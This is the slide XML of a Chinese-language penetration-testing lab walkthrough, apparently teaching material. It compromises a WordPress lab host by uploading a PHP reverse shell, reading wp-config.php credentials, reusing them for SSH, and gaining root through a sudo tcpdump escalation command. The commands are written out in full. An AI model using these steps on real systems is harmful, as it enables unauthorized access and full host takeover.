            <a:ext cx="5763614" cy="331499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37" name="Google Shape;23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826108" flipH="1">
            <a:off x="6684733" y="4534115"/>
            <a:ext cx="285905" cy="28590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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7025359" y="4238273"/>
            <a:ext cx="852049" cy="36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成功登入</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="Google Shape;239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尋找注入點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" name="Google Shape;245;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1193886"/>
            <a:ext cx="8256298" cy="80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成功存取服務後，下一步是嘗試透過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wordpress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後台去協助注入我們的惡意程式，以讓我們可以完成反向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shell</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/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嘗試尋找可以上傳檔案的地方，鎖定在上傳佈景主題的功能</a:t>
            </a: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6" name="Google Shape;24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439" y="2002336"/>
            <a:ext cx="3354661" cy="301576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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1900136" y="2509594"/>
            <a:ext cx="329131" cy="11346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4963" y="2566327"/>
            <a:ext cx="4485232" cy="148748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49" name="Google Shape;24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239763" flipH="1">
            <a:off x="5808509" y="3507431"/>
            <a:ext cx="763168" cy="763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87814" y="4363075"/>
            <a:ext cx="2744252" cy="655024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51" name="Google Shape;251;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5129944" y="4583097"/>
            <a:ext cx="503293" cy="20916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0E0A724-CBED-4B0E-9815-1A8F12DA6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379" y="3444952"/>
            <a:ext cx="3665850" cy="578423"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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上傳</a:t>
            </a:r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 Reverse shell </a:t>
            </a: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的惡意檔案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226931" y="1193885"/>
            <a:ext cx="8256298" cy="153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嘗試上傳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Reverse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shell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的惡意腳本，我們使用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Kali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提供的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php reverse shell script</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/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查看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kali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內建的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php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惡意腳本，放置於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/usr/share/webshells/php</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/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cd /usr/share/webshells/php</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/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ls /usr/share/webshells/php</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="259" name="Google Shape;25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2910" y="2016964"/>
            <a:ext cx="5680319" cy="79934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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5868417" y="3704322"/>
            <a:ext cx="1373364" cy="16686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226931" y="3331719"/>
            <a:ext cx="8256298" cy="69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複製一份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php-reverse-shell.php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惡意腳本到家目錄</a:t>
            </a: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sudo cp php-reverse-shell.php ~</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="264" name="Google Shape;264;p21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254798" y="3995203"/>
            <a:ext cx="1615217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" name="Google Shape;265;p21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2943074" y="3985278"/>
            <a:ext cx="141275" cy="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6" name="Google Shape;266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上傳</a:t>
            </a:r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 Reverse shell </a:t>
            </a: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的惡意檔案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226931" y="1193885"/>
            <a:ext cx="8256298" cy="688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回到家目錄</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1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cd ~</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Google Shape;273;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1882196"/>
            <a:ext cx="2342733" cy="688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檢查檔案是否成功被複製</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1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ls</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="274" name="Google Shape;27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2920" y="2179477"/>
            <a:ext cx="6339998" cy="78206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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4391789" y="2749873"/>
            <a:ext cx="1374937" cy="16018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上傳</a:t>
            </a:r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 Reverse shell </a:t>
            </a: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的惡意檔案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2" name="Google Shape;282;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1193885"/>
            <a:ext cx="8256298" cy="688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修改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php-reverse-shell.php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中的參數，以符合我們的滲透環境</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none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sudo mousepad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0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php-reverse-shell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.php</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="Google Shape;283;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4924633" y="1701565"/>
            <a:ext cx="4219367" cy="361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r>
              <a:rPr lang="en-US" sz="9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並不是所有的 exploit 都是需要被修改的，要看該 exploit 的code才可得知要調整哪些參數。</a:t>
            </a:r>
            <a:endParaRPr sz="9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84" name="Google Shape;28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3719" y="1721868"/>
            <a:ext cx="210914" cy="21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314" y="2318779"/>
            <a:ext cx="4670031" cy="251643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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="625684" y="2947939"/>
            <a:ext cx="2196547" cy="18808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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="625683" y="3194240"/>
            <a:ext cx="1353241" cy="18808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5083840" y="2668181"/>
            <a:ext cx="4060160" cy="154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$ip: </a:t>
            </a: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修改成 </a:t>
            </a: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kali ip</a:t>
            </a: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，建立 </a:t>
            </a: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kali</a:t>
            </a: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與 靶機的連接</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1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$port: </a:t>
            </a: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設為 </a:t>
            </a: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4444</a:t>
            </a:r>
            <a:endParaRPr/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修改好後再次檢查 </a:t>
            </a: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script</a:t>
            </a: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被正確調整</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1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cat php-reverse-shell.php</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Google Shape;289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上傳</a:t>
            </a:r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 Reverse shell </a:t>
            </a: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的惡意檔案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5" name="Google Shape;295;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1193886"/>
            <a:ext cx="8256298" cy="3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上傳修改好的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php-reverse-shell.php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檔案</a:t>
            </a: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96" name="Google Shape;29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0680" y="1148593"/>
            <a:ext cx="4638496" cy="128169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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="568125" y="1589670"/>
            <a:ext cx="3328311" cy="73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Wordpress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回傳上傳的檔案無法被正確安裝，但我們已成功將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reverse shell script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上傳到目標主機。</a:t>
            </a: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8" name="Google Shape;298;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="297444" y="2423917"/>
            <a:ext cx="8256298" cy="2196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接下來我們要嘗試找出我們的腳本被傳至哪個目錄，以及如何去促使目標機執行惡意檔案</a:t>
            </a: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繼續對已找到的目錄路徑作第二層的枚舉</a:t>
            </a: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(1)  gobuster dir -u 192.168.239.133/wp-content -w /usr/share/wordlists/dirb/common.txt -t 5</a:t>
            </a:r>
          </a:p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Montserrat" panose="02020500000000000000" charset="0"/>
              </a:rPr>
              <a:t>(2) dirb http://192.168.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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239.133</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="02020500000000000000" charset="0"/>
              </a:rPr>
              <a:t> /usr/share/wordlists/dirb/common.txt</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="02020500000000000000" charset="0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99" name="Google Shape;29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3454" y="3522257"/>
            <a:ext cx="5049775" cy="144279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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3433453" y="4442627"/>
            <a:ext cx="2454807" cy="11054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上傳</a:t>
            </a:r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 Reverse shell </a:t>
            </a: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的惡意檔案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7" name="Google Shape;307;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1193886"/>
            <a:ext cx="8256298" cy="35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進入 </a:t>
            </a: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http://192.168.239.133/wp-content/uploads/ </a:t>
            </a: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，成功發現儲存上傳檔案的目錄。 </a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none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08" name="Google Shape;30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0691" y="1744411"/>
            <a:ext cx="4965794" cy="1830414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09" name="Google Shape;30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764463" flipH="1">
            <a:off x="3422597" y="2854289"/>
            <a:ext cx="458546" cy="45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618" y="1744411"/>
            <a:ext cx="2471729" cy="310905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1" name="Google Shape;311;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4367438"/>
            <a:ext cx="1047890" cy="17786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執行</a:t>
            </a:r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 Reverse shell</a:t>
            </a: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26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1193886"/>
            <a:ext cx="8256298" cy="71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新開啟一個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terminal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，啟動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netcat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監聽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reverse shell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的流量</a:t>
            </a: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nc -nlvp 4444</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="319" name="Google Shape;31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5709" y="1628643"/>
            <a:ext cx="3610479" cy="943107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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="2767945"/>
            <a:ext cx="8256298" cy="46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 </a:t>
            </a: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/uploads</a:t>
            </a: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中的 </a:t>
            </a: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php-reverse-shell.php </a:t>
            </a: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觸發靶機執行惡意</a:t>
            </a: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script</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="Google Shape;321;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="3197470"/>
            <a:ext cx="8256298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netcat listener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成功收到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reverse shell</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="322" name="Google Shape;32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6642" y="3564370"/>
            <a:ext cx="5798066" cy="143685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蒐集資訊，提升權限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9" name="Google Shape;329;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1193886"/>
            <a:ext cx="8256298" cy="71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查看目前的用戶名稱，得知目前用戶為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www-data</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/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whoami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0" name="Google Shape;33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4026" y="1551389"/>
            <a:ext cx="742103" cy="33898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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="2126777"/>
            <a:ext cx="8256298" cy="163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查看目前用戶權限</a:t>
            </a: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find / -perm -u=s -type f 2&gt;/dev/null</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/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沒有發現可利用的可執行檔</a:t>
            </a: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sudo -l</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/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沒有可以以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root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權限執行的命令</a:t>
            </a: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32" name="Google Shape;33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96216" y="1790355"/>
            <a:ext cx="5083252" cy="259466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蒐集資訊，提升權限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9" name="Google Shape;339;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1193885"/>
            <a:ext cx="3250459" cy="3726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查看網站配置文件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wp-config.php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cd /var/www/html</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/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ls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cat wp-config.php</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/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wp-config.php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發現網頁建置的資料庫帳號、密碼</a:t>
            </a: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40" name="Google Shape;3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0855" y="2468570"/>
            <a:ext cx="5025863" cy="2451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28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4164859" y="3747825"/>
            <a:ext cx="226931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2" name="Google Shape;342;p28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4164859" y="3354032"/>
            <a:ext cx="1615217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3" name="Google Shape;343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" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_6c9305179110d399db6513adb9bc7aa9.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710394444&amp;Signature=05DgDu1MEWLg05RiUAnaZ7QkQsw%3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546" y="2135825"/>
            <a:ext cx="3746220" cy="223495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"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="416649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下載</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Kali</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:endParaRPr sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Google Shape;58;p3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702650" y="1084326"/>
            <a:ext cx="844135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 "/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="11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https://www.kali.org/get-kali/#kali-virtual-machines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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1084326"/>
            <a:ext cx="927749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1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URL:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60" name="Google Shape;60;p3" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_e313f0fa22d66afcb0f73b1985869a65.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710394618&amp;Signature=79giQAOXVCleTNXVKSJFzfZcJUY%3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23325" y="2135825"/>
            <a:ext cx="3746220" cy="223495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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="625546" y="1752681"/>
            <a:ext cx="2184399" cy="37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"/>
              <a:buNone/>
            </a:pP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Virtual Machines</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Google Shape;62;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4923325" y="1752681"/>
            <a:ext cx="2184399" cy="37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VMware 64</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Google Shape;63;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2532031" y="2732618"/>
            <a:ext cx="1646175" cy="151900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4948682" y="2462873"/>
            <a:ext cx="938186" cy="907726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蒐集資訊，提升權限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9" name="Google Shape;349;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1193886"/>
            <a:ext cx="8603370" cy="105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嘗試使用發現的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DB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憑證作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SSH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連線</a:t>
            </a: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ssh webdeveloper@192.168.239.133 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 開啟一個新的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terminal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)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/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webdeveloper / MasterOfTheUniverse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0" name="Google Shape;35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2115" y="2342733"/>
            <a:ext cx="5066954" cy="260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778040">
            <a:off x="2949946" y="4652726"/>
            <a:ext cx="369214" cy="36921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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="173537" y="4318047"/>
            <a:ext cx="3161764" cy="42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我們成功以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webdeveloper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身份連線主機</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="Google Shape;353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蒐集資訊，提升權限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9" name="Google Shape;359;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226931" y="1193886"/>
            <a:ext cx="8603370" cy="105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查看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webdeveloper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用戶可執行的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sudo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命令</a:t>
            </a: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sudo -l</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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887" y="2023376"/>
            <a:ext cx="6359443" cy="109674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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1392278" y="3234607"/>
            <a:ext cx="6359443" cy="71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發現此用戶可以以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root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權限執行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tcpdump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2" name="Google Shape;36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 flipH="1">
            <a:off x="1056588" y="3176485"/>
            <a:ext cx="335690" cy="33569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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4325045" y="1109573"/>
            <a:ext cx="4138161" cy="1266532"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6400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1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蒐集資訊，提升權限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0" name="Google Shape;370;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="193558" y="1201896"/>
            <a:ext cx="8603370" cy="77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Google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查詢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tcpdump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指令的提權方式</a:t>
            </a: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sng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https://gtfobins.github.io/gtfobins/tcpdump/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31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="193557" y="2509677"/>
            <a:ext cx="7814370" cy="252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webdeveloper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用戶執行以下指令，再度觸發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script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，記得要再開啟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netcat listener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, (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="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nc -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1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lvnp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="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 4444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dirty="0"/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COMMAND='php /var/www/html/wp-content/uploads/2024/11/php-reverse-shell.php'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TF=$(mktemp)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echo "$COMMAND" &gt; $TF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chmod +x $TF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sudo tcpdump -ln -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0" err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eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="372" name="Google Shape;37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9027" y="1177298"/>
            <a:ext cx="3970196" cy="113108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蒐集資訊，提升權限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9" name="Google Shape;379;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="193558" y="1201896"/>
            <a:ext cx="8603370" cy="38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成功取得 </a:t>
            </a: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reverse shell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="380" name="Google Shape;38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562" y="1588520"/>
            <a:ext cx="6781243" cy="139918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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="193558" y="3096328"/>
            <a:ext cx="8603370" cy="681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查看用戶身份</a:t>
            </a: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44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whoami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2" name="Google Shape;38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562" y="3886360"/>
            <a:ext cx="2379309" cy="498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279046" flipH="1">
            <a:off x="1564868" y="4502964"/>
            <a:ext cx="474469" cy="47446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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2229093" y="4594759"/>
            <a:ext cx="2273633" cy="54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成功 </a:t>
            </a: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Privilege escalation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Google Shape;385;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3864507" y="3160966"/>
            <a:ext cx="2502174" cy="38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路徑 </a:t>
            </a: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/root </a:t>
            </a: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中，可取得 </a:t>
            </a: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flag</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="386" name="Google Shape;386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2000" y="3584903"/>
            <a:ext cx="3219899" cy="80021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sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>蒐集資訊，提升權限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9" name="Google Shape;379;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="193558" y="1201896"/>
            <a:ext cx="8603370" cy="38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嘗試獲取 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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pseudo-terminal</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Montserrat" panose="02020500000000000000" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Google Shape;387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FA97309-BE80-4A7B-972A-A399833AE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701" y="1517974"/>
            <a:ext cx="3329775" cy="563245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;352;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E43ABA94-1929-4317-A35A-6F5C57AA358D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="962537" y="1911423"/>
            <a:ext cx="3161764" cy="42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r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1200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但</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" alt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發現目標主機沒有安裝 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none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python</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Montserrat" panose="02020500000000000000" charset="0"/>
            </a:endParaRP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22FBF181-6925-4687-B1FF-00E878F22E29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="670273" y="2032188"/>
            <a:ext cx="220258" cy="119080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Google Shape;379;p32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62F5DC13-329E-4B2E-B245-44F02C365F84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="193558" y="2269854"/>
            <a:ext cx="8603370" cy="38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嘗試於目標主機上安裝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200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微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:cs typeface="Microsoft JhengHei"/>
                <a:sym typeface="Microsoft JhengHei"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Montserrat" panose="02020500000000000000" charset="0"/>
              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/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FC225312-98DB-4C57-99F8-D58445D416BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663600" y="2777243"/>
            <a:ext cx="220258" cy="119080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Google Shape;352;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2C0440D-119C-4055-A814-E29B1D71E585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="962537" y="2656478"/>
            <a:ext cx="3161764" cy="42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sudo apt-get install python3.7</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Montserrat" panose="02020500000000000000" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;379;p32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{896F9072-8776-47CC-9AB1-3764C3AC6E0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="193558" y="3046359"/>
            <a:ext cx="8603370" cy="38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90000"/>
              </a:lnSpc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zh-TW" altLang="en-US" sz="1200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再次獲取 </a:t>
            </a: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pseudo-terminal</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Montserrat" panose="02020500000000000000" charset="0"/>
              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/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03CB1259-6936-49F1-84F7-6E5BB030E492}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663600" y="3553748"/>
            <a:ext cx="220258" cy="119080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Google Shape;352;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
